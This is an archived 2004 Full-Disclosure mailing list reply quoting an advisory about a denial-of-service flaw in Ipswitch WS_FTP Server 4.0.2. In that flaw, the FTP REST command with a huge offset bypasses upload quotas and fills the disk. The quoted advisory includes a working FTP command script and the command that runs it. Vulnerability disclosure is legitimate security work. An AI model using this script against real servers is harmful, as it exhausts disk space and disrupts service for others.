lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4060C615.2010607@home.se>
Date: Wed, 24 Mar 2004 00:19:49 +0100
From: exon <exon@...e.se>
To: Hugh Mann <hughmann@...mail.com>
Cc: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com,
   info@...witch.com, secure@...witch.com
Subject: Re: How to crash a harddisk - the Ipswitch WS_FTP Server way


This is old news.
It is also RFC compliant behaviour, even though admitted silly.

/exon

Hugh Mann wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
>
> Advisory Name: How to crash a harddisk - the Ipswitch WS_FTP Server way
> Impact       : Denial of Service
> Discovered by: Hugh Mann hughmann@...mail.com
> Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
>
>
> Description
> ~~~~~~~~~~~
> It's possible for any user with write access to a directory, even when 
> there's a limit to how much data the user can upload, to use up all 
> available disk space on any partition it can upload to. Even a slow 
> modem user can do this because the user only needs to send a few bytes 
> to the server.
>
> Details
> ~~~~~~~
> The REST command is used to change the file pointer where new data 
> will be written to the file next time the user sends an upload command 
> such as STOR. A user can create arbitrary sized files (up to 2^64-1 
> bytes) by specifying a large value as the argument to REST and then 
> sending a small file with STOR.
>
> WS_FTP Server doesn't count the extra bytes starting from the end of 
> the original file to the new file pointer location when checking if 
> the user can upload more bytes. The next time the user tries to upload 
> a file, WS_FTP Server will give an error.
>
> Exploit
> ~~~~~~~
> Save this in a file called ftpcmds.txt, after changing the FTP server 
> name, username, and password.
>
> <<<<<<<<<<<<
> open ftp.server.mob
> username
> password
> !echo.>2byte.txt
> !echo.>2byte_2.txt
> dir
> put 2byte_2.txt
> dir
> del 2byte_2.txt
> quote REST 1073741822
> put 2byte.txt
> dir
> put 2byte_2.txt
> del 2byte.txt
> del 2byte_2.txt
> !del 2byte.txt
> !del 2byte_2.txt
> quit
>
>>>>>>>>>>>>>
>
> Then start it:
>
> C:\>ftp -s:ftpcmds.txt
>
> to see the result. It will create a 1GB file and then delete it.
>
> _________________________________________________________________
> Is your PC infected? Get a FREE online computer virus scan from 
> McAfee® Security. 
> http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ